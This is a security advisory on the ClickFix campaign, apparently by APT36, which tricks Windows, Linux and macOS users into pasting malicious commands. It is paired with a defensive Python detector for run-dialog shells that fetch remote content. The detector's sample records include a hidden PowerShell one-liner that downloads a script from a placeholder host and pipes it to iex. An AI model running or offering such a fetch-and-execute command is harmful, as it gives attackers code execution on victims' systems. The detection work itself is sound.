A new ClickFix attack campaign has been observed targeting Windows, Linux, macOS, and even web users by using social engineering techniques that trick victims into executing malicious commands. This campaign is linked to the APT36 group and employs impersonation tactics involving fake government websites to infect systems with information-stealing malware or perform other malicious activities.
Affected: Windows, Linux, macOS, Web users
Keypoints
- ClickFix is a social engineering attack that manipulates users to execute malicious commands by mimicking verification systems or error messages.
- Historically targeting Windows, recent campaigns have expanded to include macOS and Linux systems.
- The 2024 campaign involves fake Google Meet errors and impersonates India's Ministry of Defence to lure victims.
- Attacks on Windows involve executing PowerShell scripts that download malware or ransomware, while Linux attacks use shell commands to fetch images or potentially malicious scripts.
- Linux victims are prompted to run commands via the ALT+F2 run dialog, leading to the download of payloads that are currently non-malicious but could later be swapped for harmful code.
- The threat group behind the attacks, APT36, appears to be testing and adapting its methods across different operating systems, indicating increasing sophistication.
- Users are advised to avoid executing commands from untrusted sources and verify the safety of commands before pasting them into system terminals.
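The pattern described in the keypoints (a shell interpreter launched from a run dialog, with a command line that fetches remote content and hands it to an interpreter) is visible in process-creation telemetry, which gives defenders a detection hook that does not depend on the lure. The script below is an added example written for this advisory, not code from the original page or from any vendor; it scores simplified process-creation records against that pattern. The `parent=... image=... cmd="..."` record layout, the hostnames and the sample records are all constructed for the example.

```python
"""Heuristic detection of ClickFix-style launches in process-creation logs.

Added example for this advisory, not code from the original page or from any
vendor. It scores simplified process-creation records (constructed here; the
'parent=... image=... cmd="..."' layout is an assumption of this example, not a
real product's log format) for the pattern the advisory describes: a shell
interpreter started from a desktop run dialog (Win+R / ALT+F2) whose command
line fetches remote content and pipes it into an interpreter.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Interpreters a pasted ClickFix command ends up running in.
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe", "sh", "bash", "zsh"}

# Parent processes that correspond to a user-driven run dialog or desktop shell.
RUN_DIALOG_PARENTS = {"explorer.exe", "gnome-shell", "plasmashell", "krunner", "xfce4-appfinder"}

# Fragments that fetch remote content (Windows and Unix tooling).
DOWNLOAD_RE = re.compile(
    r"\b(curl|wget|iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile)\b",
    re.I,
)
# Fragments that execute whatever was fetched.
EVAL_RE = re.compile(r"\b(iex|Invoke-Expression)\b|\|\s*(sh|bash|zsh)\b", re.I)
# PowerShell window hiding, common in pasted one-liners.
HIDDEN_RE = re.compile(r"-(w|WindowStyle)\s+hidden", re.I)

# Constructed record layout used by this example only.
LINE_RE = re.compile(r'parent=(\S+)\s+image=(\S+)\s+cmd="(.*)"$')


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Strip any Windows or POSIX directory prefix and lower-case the file name."""
    return re.split(r"[\\/]", path)[-1].lower()


def parse_event(line: str) -> ProcessEvent:
    """Parse one constructed log line into a ProcessEvent."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised log line: {line!r}")
    return ProcessEvent(*m.groups())


def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Return (score, reasons); one point per indicator. Non-shell children score 0."""
    if basename(ev.image) not in SHELL_IMAGES:
        return 0, []
    reasons: list[str] = []
    if basename(ev.parent_image) in RUN_DIALOG_PARENTS:
        reasons.append("shell launched from a run dialog / desktop shell")
    if DOWNLOAD_RE.search(ev.command_line):
        reasons.append("command line fetches remote content")
    if EVAL_RE.search(ev.command_line):
        reasons.append("fetched content is piped into an interpreter")
    if HIDDEN_RE.search(ev.command_line):
        reasons.append("window is hidden")
    return len(reasons), reasons


def find_clickfix_candidates(lines, min_score: int = 2):
    """Return (event, score, reasons) for every record scoring at least min_score."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        score, reasons = score_event(ev)
        if score >= min_score:
            hits.append((ev, score, reasons))
    return hits


# Constructed sample records (not real telemetry); hostnames are placeholders.
SAMPLE_LOG = [
    'parent=C:\\Windows\\explorer.exe image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'cmd="powershell -w hidden -c iwr http://placeholder.invalid/p.ps1 | iex"',
    'parent=/usr/bin/gnome-shell image=/bin/sh '
    'cmd="sh -c \'curl -fsSL http://placeholder.invalid/img.jpg -o /tmp/img.jpg\'"',
    'parent=C:\\Users\\dev\\code.exe image=powershell.exe cmd="powershell -NoProfile -File build.ps1"',
    'parent=/bin/bash image=/bin/bash cmd="bash -c \'ls -la /tmp\'"',
    'parent=explorer.exe image=cmd.exe cmd="cmd /c dir"',
]

if __name__ == "__main__":
    for ev, score, reasons in find_clickfix_candidates(SAMPLE_LOG):
        print(f"[score {score}] {ev.image}: {ev.command_line}")
        for reason in reasons:
            print("   -", reason)
```

Run on the constructed records, the Windows one-liner scores 4 and the Linux `curl` download from the desktop shell scores 2, while a developer's build script, an ordinary `ls` and a bare `cmd /c dir` from the Run dialog stay below the threshold. The threshold of two indicators is the design choice worth tuning: a shell spawned by `explorer.exe` alone is routine, but a shell spawned by the run dialog that also reaches out to the network is exactly the sequence the advisory describes, and that combination is rare in legitimate interactive use.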